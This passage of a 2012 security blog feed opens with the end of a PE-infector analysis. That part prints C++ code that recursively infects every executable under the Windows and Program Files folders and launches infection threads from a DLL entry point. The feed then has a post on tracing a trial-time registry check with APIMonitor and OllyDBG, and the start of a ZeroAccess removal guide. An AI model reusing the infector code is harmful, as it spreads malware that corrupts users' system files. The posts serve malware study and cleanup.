 if (!CreateNamedMutex(L"peinfector", &amp;amp;hMutex))
  return;

 // Get %windir% and %progfiles%
 SHGetFolderPath(NULL,CSIDL_WINDOWS, NULL, SHGFP_TYPE_CURRENT, win); //Windows
 SHGetFolderPath(NULL,CSIDL_PROGRAM_FILES, NULL, SHGFP_TYPE_CURRENT, progs); //Program Files

 InfectDirectory(win);
 InfectDirectory(progs);

 // Release mutex
 ReleaseMutex(hMutex); 
}
&lt;/pre&gt;
&lt;br /&gt;
&lt;br /&gt;
The &lt;b&gt;InfectDirectory &lt;/b&gt;function will iterate recursively files and subdirectories, triggering the &lt;b&gt;InfectPE&lt;/b&gt; function for each file (this is the same function as before). I've added a Sleep to relax CPU as this task can be long. The quietest we are, the best it is.&lt;br /&gt;
&lt;br /&gt;
&lt;pre class="brush: csharp"&gt;void InfectDirectory(wstring path)
{
 WIN32_FIND_DATA ffd;
    HANDLE hFind = INVALID_HANDLE_VALUE;

 // Build search dir
 wstring pathDir = path + L"\\*";

    // Find the first file in the directory.
 hFind = FindFirstFile(pathDir.c_str(), &amp;amp;ffd);

 // No files
    if (INVALID_HANDLE_VALUE == hFind) return;

 // Loop
    do
    { 
  if (!_tcsicmp(ffd.cFileName, L".") || !_tcsicmp(ffd.cFileName, L".."))
   continue;

  // Directories
  else if ((ffd.dwFileAttributes &amp;amp; FILE_ATTRIBUTE_DIRECTORY))
  {
   // get full path of directory
   pathDir = path + L"\\" + wstring(ffd.cFileName);

   // Iterate inside
   InfectDirectory(pathDir);
  }

  // Files
  else if (!(ffd.dwFileAttributes &amp;amp; FILE_ATTRIBUTE_DIRECTORY))
  {
   // get full path of file
   pathDir = path + L"\\" + wstring(ffd.cFileName);
   
   // Infect file
   InfectPe(pathDir);
  }

  // To not occupy all CPU
  Sleep(50);

    }// fin do
    while (FindNextFile(hFind, &amp;amp;ffd) != 0);
    FindClose(hFind);
}
&lt;/pre&gt;
&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="color: #0b5394; text-align: left;"&gt;
&lt;h4&gt;
&lt;i&gt;Here's what we've got once Explorer has loaded the DLL :&lt;/i&gt;&lt;/h4&gt;
&lt;h4&gt;
&lt;i&gt;&amp;nbsp;&lt;/i&gt;&lt;/h4&gt;
&lt;/div&gt;
&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;img border="0" height="314" src="http://1.bp.blogspot.com/-WZcSbb205Ns/UE2-BWSVV3I/AAAAAAAAAIU/zlhd_qstWbM/s640/Capture3.PNG" style="margin-left: auto; margin-right: auto;" width="640" /&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;File infection&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;h4&gt;
&lt;i&gt;&lt;span style="color: #0b5394;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/i&gt;&lt;/h4&gt;
&lt;h4&gt;
&lt;i&gt;&lt;span style="color: #0b5394;"&gt;And after several minutes:&amp;nbsp;&lt;/span&gt;&lt;/i&gt;&lt;/h4&gt;
&lt;h4&gt;
&lt;i&gt;&lt;span style="color: #0b5394;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/i&gt;&lt;/h4&gt;
&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-3Buv2m5T5A4/UE3Bf4PQDSI/AAAAAAAAAIo/dX7hFP4ScTs/s1600/Capture4.PNG" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" height="354" src="http://2.bp.blogspot.com/-3Buv2m5T5A4/UE3Bf4PQDSI/AAAAAAAAAIo/dX7hFP4ScTs/s640/Capture4.PNG" width="640" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;File infection&lt;/td&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;h3 style="text-align: left;"&gt;
&lt;i&gt;&lt;span style="color: #0b5394;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/i&gt;&lt;/h3&gt;
&lt;h3 style="text-align: left;"&gt;
&lt;i&gt;&lt;span style="color: #0b5394;"&gt;Conclusion&lt;/span&gt;&lt;/i&gt;&lt;/h3&gt;
&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;br /&gt;
&lt;i&gt;&lt;b&gt;At this time, every .exe under Windir and Program File is infected to load our dll at startup.&lt;/b&gt;&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;&lt;b&gt;Our DLL does nothing else than infecting other files. But we can simply add a Thread after our infection routine to execute some custom code with process's privileges.&amp;nbsp;&lt;/b&gt;&lt;/i&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;pre class="brush: csharp"&gt;BOOL APIENTRY DllMain( HMODULE hModule,
                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved
      )
{
 DWORD ret = 0;

 switch (ul_reason_for_call)
 {
  case DLL_PROCESS_ATTACH:
   OutputDebugString(L"I'm injected you know!");

   // Create Thread
   CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)InfectAllPe, 0, 0, &amp;amp;ret);
   CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)CustomRoutine, 0, 0, &amp;amp;ret);
   break;
  case DLL_THREAD_ATTACH:
  case DLL_THREAD_DETACH:
  case DLL_PROCESS_DETACH:
   break;
 }
 return TRUE;
}
&lt;/pre&gt;
&lt;i&gt;&lt;b&gt;&amp;nbsp;&lt;/b&gt;&lt;/i&gt;&lt;i&gt;&lt;b&gt; &lt;/b&gt;&lt;/i&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;i&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;
&lt;i&gt;&lt;b&gt;No suspicious process, only a &lt;/b&gt;&lt;/i&gt;&lt;i&gt;&lt;b&gt;DLL &lt;/b&gt;&lt;/i&gt;&lt;i&gt;&lt;b&gt;thread executed by a legit process (explorer.exe)&lt;/b&gt;&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;&lt;b&gt;No suspicious autostart entry (RUN, task, file in the startup folder, ...), only an entry point hijack into an essential system file.&amp;nbsp; &lt;/b&gt;&lt;/i&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;i&gt;&lt;b&gt;This make the infection stealthier, and harder to detect. However, a simple HASH check will reveal a problem into some system files.&amp;nbsp;&lt;/b&gt;&lt;/i&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;i&gt;&lt;b&gt;NOTE: All has come from a thread on Rohitab.com. See the link below.&lt;/b&gt;&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;&lt;b&gt;Code is from &lt;span style="color: #351c75;"&gt;KOrUPt&lt;/span&gt;&lt;span style="color: #351c75;"&gt;&lt;span style="color: black;"&gt;. Thanks to him!&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;i&gt;&lt;b&gt; &lt;/b&gt;&lt;/i&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;i&gt;&lt;b&gt;NOTE 2: I do not provide any full source or binary, because I don't want script kiddies to copy/paste it and/or use it to put some badness over the internet. Those who can understand and compile this code are smart enough to know what is bad and what is not. &lt;/b&gt;&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/i&gt;
&lt;br /&gt;
&lt;div style="text-align: left;"&gt;
&lt;h3 style="text-align: left;"&gt;
&lt;i&gt;&lt;span style="color: #0b5394;"&gt;Links&lt;/span&gt;&lt;/i&gt;&lt;/h3&gt;
&lt;h3 style="text-align: left;"&gt;
&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;b&gt;&lt;i&gt;Rohitab:&lt;/i&gt;&lt;/b&gt; &lt;a href="http://www.rohitab.com/discuss/topic/33006-detailed-guide-to-pe-infection/"&gt;http://www.rohitab.com/discuss/topic/33006-detailed-guide-to-pe-infection/&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;br /&gt;
&lt;h3 style="text-align: left;"&gt;
&lt;/h3&gt;
&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;img src="http://feeds.feedburner.com/~r/Tigzy-rk/~4/scxY_jBIVlU" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://tigzyrk.blogspot.com/feeds/8775165972054832573/comments/default" title="Publier les commentaires" /><link rel="replies" type="text/html" href="http://tigzyrk.blogspot.com/2012/09/analysis-chronicles-of-pe-infector.html#comment-form" title="2 commentaires" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/8972660870357177426/posts/default/8775165972054832573?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/8972660870357177426/posts/default/8775165972054832573?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/Tigzy-rk/~3/scxY_jBIVlU/analysis-chronicles-of-pe-infector.html" title="[Analysis] Chronicles of a PE Infector" /><author><name>tigzy-RK</name><uri>http://www.blogger.com/profile/09732073712132941191</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="24" src="http://2.bp.blogspot.com/-ZTcduhIm5tM/TamcgoAE1dI/AAAAAAAAABg/Gqy2hRs5Vy0/s220/tigzy1295109643.gif" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://4.bp.blogspot.com/-2lstW-aOdOg/UE2ejGECGXI/AAAAAAAAAH4/iLdvoDx2vQE/s72-c/Pr%C3%A9sentation1.png" height="72" width="72" /><thr:total>2</thr:total><feedburner:origLink>http://tigzyrk.blogspot.com/2012/09/analysis-chronicles-of-pe-infector.html</feedburner:origLink></entry><entry gd:etag="W/&quot;DUUFQn05fCp7ImA9WhJWFk4.&quot;"><id>tag:blogger.com,1999:blog-8972660870357177426.post-1539046103260265250</id><published>2012-08-22T05:06:00.003-07:00</published><updated>2012-08-22T05:06:53.324-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2012-08-22T05:06:53.324-07:00</app:edited><title>[Analysis] APIMonitor is handy!</title><content type="html">&lt;div style="text-align: center;"&gt;
&lt;h2&gt;
&lt;br /&gt;&lt;/h2&gt;
&lt;h2&gt;
&lt;span style="font-size: x-large;"&gt;&lt;span style="color: #3d85c6;"&gt;APIMonitor (rohitab) is handy!&lt;/span&gt;&lt;/span&gt;&lt;/h2&gt;
&lt;/div&gt;
&lt;br /&gt;
&lt;div style="text-align: left;"&gt;
&lt;i&gt;&lt;b&gt;Here's a little analysis showing up how to combine classic tools such as Ollydbg with high level tools like APIMonitor. This helps to have a quick overview on the program / malware to reverse...&lt;/b&gt;&lt;/i&gt;&lt;br /&gt;
&lt;br /&gt;
While reversing some crackme of the "Lena151 tutorial about reversing", I realised I could drastically simplify the thing by making a "call overview" with APIMonitor. The program I had to reverse was an old program (I cannot tell the name here) with limited-in-time demo version.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;h3 style="text-align: left;"&gt;
&lt;i&gt;&lt;span style="color: #0b5394;"&gt;First Idea : Have a look with APIMonitor&lt;/span&gt;&lt;/i&gt;&lt;/h3&gt;
&lt;h3 style="text-align: left;"&gt;
&lt;br /&gt;&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&amp;nbsp;I suspected the program to get datas of remaining time either in the registry or in a file. So with APIMonitor, I decided to monitor APIs in &lt;b&gt;"File management"&lt;/b&gt; and &lt;b&gt;"Registry"&lt;/b&gt;.&lt;/li&gt;
&lt;/ul&gt;
&amp;nbsp;&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-tYAGJObvWIU/UDSo7mSzwoI/AAAAAAAAAGo/mNLQzp1s1js/s1600/apifilter1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://4.bp.blogspot.com/-tYAGJObvWIU/UDSo7mSzwoI/AAAAAAAAAGo/mNLQzp1s1js/s1600/apifilter1.PNG" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-diwzLl1g2cI/UDSo89ZsJ6I/AAAAAAAAAGw/UBQa4v1BPig/s1600/apifilter2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://3.bp.blogspot.com/-diwzLl1g2cI/UDSo89ZsJ6I/AAAAAAAAAGw/UBQa4v1BPig/s1600/apifilter2.PNG" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;ul&gt;
&lt;li&gt;&amp;nbsp;Then I started to monitor. After a bit of filtering / thinking and testing, I found the program was indeed registering remaining time in the registry, at key : &lt;b style="color: #a64d79;"&gt;HKLM/Software/Win16.2/Level : 0&lt;/b&gt;&lt;span style="color: #a64d79;"&gt;&lt;span style="color: black;"&gt;.&lt;/span&gt;&lt;/span&gt;&lt;b style="color: #a64d79;"&gt; &lt;/b&gt;&lt;span style="color: #a64d79;"&gt;&lt;span style="color: black;"&gt;The fact of removing the key was resetting the remaining time. A good thing, but not enough!&lt;/span&gt;&lt;/span&gt; Here's a capture of APIMonitor, with some lightning.&lt;/li&gt;
&lt;/ul&gt;
&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-IGh1B4FhDuA/UDSq4II6lGI/AAAAAAAAAG4/-hpORALVq04/s1600/ApiMon1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="557" src="http://4.bp.blogspot.com/-IGh1B4FhDuA/UDSq4II6lGI/AAAAAAAAAG4/-hpORALVq04/s640/ApiMon1.PNG" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: #a64d79;"&gt;&lt;/span&gt;The interesting API call is highlighted, &lt;b&gt;&lt;span style="color: #741b47;"&gt;RegQueryValueExA&lt;/span&gt;&lt;/b&gt;. &lt;br /&gt;
The same call occurs just above, but only to get size of datas (some skills in API programming is required to understand this...). We can see every parameters, with their state before and after the call. on the right side you can see the state of the &lt;b&gt;data buffer after the call&lt;/b&gt;, containing the interesting datas.&lt;br /&gt;
&lt;br /&gt;
The most interesting thing is in the call stack, &lt;b&gt;we can get the address of the call inside the program&lt;/b&gt;! This will be really helpful to begin our analysis with OllyDBG. Let's fire Olly at address &lt;b style="color: #741b47;"&gt;0x488B7D&lt;/b&gt;.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;h3 style="text-align: left;"&gt;
&lt;i&gt;&lt;span style="color: #0b5394;"&gt;Second part : Take over with OllyDBG&lt;/span&gt;&lt;/i&gt;&lt;/h3&gt;
&lt;h3 style="text-align: left;"&gt;
&lt;i&gt;&lt;/i&gt;&lt;/h3&gt;
&lt;h3 style="text-align: left;"&gt;
&lt;i&gt;&lt;span style="color: #0b5394;"&gt;&lt;/span&gt;&lt;/i&gt;&lt;/h3&gt;
&lt;h3 style="text-align: left;"&gt;
&amp;nbsp;&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;span style="font-size: small;"&gt;We fire Olly, and we place a breakpoint at the address above. At startup, we break into it. Good. Let's see what we have here.&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;span style="font-size: small;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://2.bp.blogspot.com/-xA6LpHxmBD0/UDTBAhOwmSI/AAAAAAAAAHI/eXH8TkdHqmI/s1600/Olly1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://2.bp.blogspot.com/-xA6LpHxmBD0/UDTBAhOwmSI/AAAAAAAAAHI/eXH8TkdHqmI/s1600/Olly1.PNG" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;span style="font-size: small;"&gt;&amp;nbsp;&lt;/span&gt;&lt;div style="font-weight: normal; text-align: left;"&gt;
&lt;span style="font-size: small;"&gt;We can see the API (RegQueryValueA), and we have all parameters passed in reverse order (first is last). See the comments to know which one is what.&lt;/span&gt;&lt;/div&gt;
&lt;div style="font-weight: normal; text-align: left;"&gt;
&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;ul&gt;
&lt;li&gt;&lt;span style="font-size: small;"&gt;Let's have a look into the registers&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;span style="font-size: small;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://1.bp.blogspot.com/-6fvvhnYvfuQ/UDTBBUxxmII/AAAAAAAAAHQ/MLM5ljV4y3c/s1600/Olly2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://1.bp.blogspot.com/-6fvvhnYvfuQ/UDTBBUxxmII/AAAAAAAAAHQ/MLM5ljV4y3c/s1600/Olly2.PNG" /&gt;&lt;/a&gt; &lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
I let you associate the register's values with parameters pushed on the stack before the API call...&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;ul&gt;
&lt;li&gt;After the call, here's the content of the buffer (You can compare with APIMonitor's value, it begins with &lt;b style="color: #741b47;"&gt;0x27 0x0E&lt;/b&gt;)&lt;/li&gt;
&lt;/ul&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-fyBbo_oXVJk/UDTBDgQ6_oI/AAAAAAAAAHc/6JRK5hrkP6s/s1600/Olly4.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://4.bp.blogspot.com/-fyBbo_oXVJk/UDTBDgQ6_oI/AAAAAAAAAHc/6JRK5hrkP6s/s1600/Olly4.PNG" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://1.bp.blogspot.com/-qjgSXtmM5lo/UDTBESUVtpI/AAAAAAAAAHk/MaG-boD98S4/s1600/Olly5.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;br /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;ul&gt;
&lt;li&gt;&lt;span style="font-size: small;"&gt;The next step is to define a &lt;b&gt;breakpoint on memory access over this buffer&lt;/b&gt; (take the first byte), in order to break where the check will be made. We don't know if it's relevant yet, but it can be (reversing is always made of guesses and surprises...)&lt;/span&gt; &lt;/li&gt;
&lt;/ul&gt;
&lt;span style="font-size: small;"&gt;&lt;/span&gt;&lt;ul&gt;
&lt;li&gt;&lt;span style="font-size: small;"&gt;&amp;nbsp;After done this, we break into the "check routine" (notice the big loop made of several jumps and calls)&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;span style="font-size: small;"&gt;&amp;nbsp;&lt;/span&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;a href="http://1.bp.blogspot.com/-qjgSXtmM5lo/UDTBESUVtpI/AAAAAAAAAHk/MaG-boD98S4/s1600/Olly5.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="332" src="http://1.bp.blogspot.com/-qjgSXtmM5lo/UDTBESUVtpI/AAAAAAAAAHk/MaG-boD98S4/s640/Olly5.PNG" width="640" /&gt;&lt;/a&gt; &lt;/div&gt;
&lt;h3 style="text-align: left;"&gt;
&lt;i&gt;&lt;span style="color: #0b5394;"&gt;&lt;/span&gt;&lt;/i&gt;&lt;/h3&gt;
&amp;nbsp;&lt;ul&gt;
&lt;li&gt;What is needed now, is to &lt;b&gt;decrypt how this check is done&lt;/b&gt;, and patch the program (or better, find a way to bypass the checks without patching) to have unlimited access to it. But this is not a tutorial on how to crack a software :)&lt;/li&gt;
&lt;/ul&gt;
&amp;nbsp;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;h3 style="text-align: left;"&gt;
&lt;i&gt;&lt;span style="color: #0b5394;"&gt;Conclusion&lt;/span&gt;&lt;/i&gt;&lt;/h3&gt;
&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;br /&gt;&amp;nbsp;&lt;i&gt;&lt;b&gt;I will not go further this time, as the main goal was more to show how to combine "high level" tools with classic reverse analysis, in order to earn a fantastic amount of time.&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;i&gt;&lt;b&gt;&amp;nbsp;&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;i&gt;&lt;b&gt;A classic way to do this without APIMonitor would be to search every call to RegQueryValue (A+W), place breakpoints on them, debug, then watch the parameters, and so on. Here, there's a whole lot of such calls... So it take a long time before breaking into the good place.&amp;nbsp;&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;i&gt;&lt;b&gt;&amp;nbsp;&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;i&gt;&lt;b&gt;Also, I could be wrong with the registry, it could also be a file check. With APIMonitor, everything is in front of us, well filtered and displayed.&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;i&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;i&gt;&lt;b&gt;I would like to thanks Rohitab for their great work.&amp;nbsp;&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;i&gt;&lt;b&gt;APIMonitor is free. So is OllyDBG.&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;i&gt;&lt;b&gt;&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;i&gt;&lt;b&gt;&amp;nbsp;&lt;/b&gt;&lt;/i&gt;&lt;h3 style="text-align: left;"&gt;
&lt;i&gt;&lt;span style="color: #0b5394;"&gt;Links&lt;/span&gt;&lt;/i&gt;&lt;/h3&gt;
&lt;h3 style="text-align: left;"&gt;
&lt;i&gt;&lt;span style="color: #0b5394;"&gt;&lt;/span&gt;&lt;/i&gt;&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;b&gt;&lt;i&gt;APIMonitor :&lt;/i&gt;&lt;/b&gt; &lt;a href="http://www.rohitab.com/apimonitor"&gt;http://www.rohitab.com/apimonitor&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;b&gt;&lt;i&gt;OllyDBG :&lt;/i&gt;&amp;nbsp; &lt;/b&gt;&lt;a href="http://www.ollydbg.de/"&gt;http://www.ollydbg.de/&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;br /&gt;
&lt;h3 style="text-align: left;"&gt;
&lt;i&gt;&lt;span style="color: #0b5394;"&gt;&lt;/span&gt;&lt;/i&gt;&lt;/h3&gt;
&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;div style="text-align: left;"&gt;
&lt;i&gt;&lt;b&gt;SPECIAL NOTE:&amp;nbsp;&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;
&lt;i&gt;&lt;b&gt;Sorry for French readers, I will now publish all technicals in english.&amp;nbsp;&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;i&gt;&lt;b&gt;Removals will stay in both language :)&lt;/b&gt;&lt;/i&gt;&lt;br /&gt;&lt;br /&gt;
&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;img src="http://feeds.feedburner.com/~r/Tigzy-rk/~4/esQlho42GcM" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://tigzyrk.blogspot.com/feeds/1539046103260265250/comments/default" title="Publier les commentaires" /><link rel="replies" type="text/html" href="http://tigzyrk.blogspot.com/2012/08/analysis-apimonitor-is-handy.html#comment-form" title="0 commentaires" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/8972660870357177426/posts/default/1539046103260265250?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/8972660870357177426/posts/default/1539046103260265250?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/Tigzy-rk/~3/esQlho42GcM/analysis-apimonitor-is-handy.html" title="[Analysis] APIMonitor is handy!" /><author><name>tigzy-RK</name><uri>http://www.blogger.com/profile/09732073712132941191</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="24" src="http://2.bp.blogspot.com/-ZTcduhIm5tM/TamcgoAE1dI/AAAAAAAAABg/Gqy2hRs5Vy0/s220/tigzy1295109643.gif" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://4.bp.blogspot.com/-tYAGJObvWIU/UDSo7mSzwoI/AAAAAAAAAGo/mNLQzp1s1js/s72-c/apifilter1.PNG" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://tigzyrk.blogspot.com/2012/08/analysis-apimonitor-is-handy.html</feedburner:origLink></entry><entry gd:etag="W/&quot;AkAHSHo4eyp7ImA9WhNTFUk.&quot;"><id>tag:blogger.com,1999:blog-8972660870357177426.post-7870980838609897557</id><published>2012-06-26T11:20:00.000-07:00</published><updated>2012-10-18T01:25:39.433-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2012-10-18T01:25:39.433-07:00</app:edited><title>[Rootkit] ZeroAccess (Max++)</title><content type="html">&lt;div style="text-align: center;"&gt;
&lt;span style="font-size: x-large;"&gt;&lt;span style="color: #3d85c6;"&gt;Comment supprimer ZeroAccess (Max++)&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: center;"&gt;
&lt;span style="font-size: x-large;"&gt;&lt;span style="color: #3d85c6;"&gt;How to get rid of &lt;/span&gt;&lt;/span&gt;&lt;span style="font-size: x-large;"&gt;&lt;span style="color: #3d85c6;"&gt;ZeroAccess (Max++)&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div style="text-align: left;"&gt;
&lt;i&gt;&lt;b&gt;MAJ du 26/06/2012&lt;/b&gt;&lt;/i&gt;:&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
ZeroAccess dans sa dernière variante n'est plus un rootkit.&amp;nbsp;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
Il se contente d'injecter un processus Windows (services.exe) avec une dll stockée à plusieurs endroits. Voici une vidéo montrant comment s'en débarrasser:&amp;nbsp; &lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;i&gt;&lt;b&gt;06/26/2012 update:&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
ZeroAccess in its latest variant is no longer a rootkit.&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
It only injects a Windows process (services.exe) with a dll stored in several locations.&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
Here's a video demonstrating how to get rid of it: &lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;object class="BLOGGER-youtube-video" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0" data-thumbnail-src="http://i.ytimg.com/vi/GW-z6F0LGeM/0.jpg" height="375" width="600"&gt;&lt;param name="movie" value="http://www.youtube.com/v/GW-z6F0LGeM?version=3&amp;f=user_uploads&amp;c=google-webdrive-0&amp;app=youtube_gdata" /&gt;




&lt;param name="bgcolor" value="#FFFFFF" /&gt;




&lt;param name="allowFullScreen" value="true" /&gt;




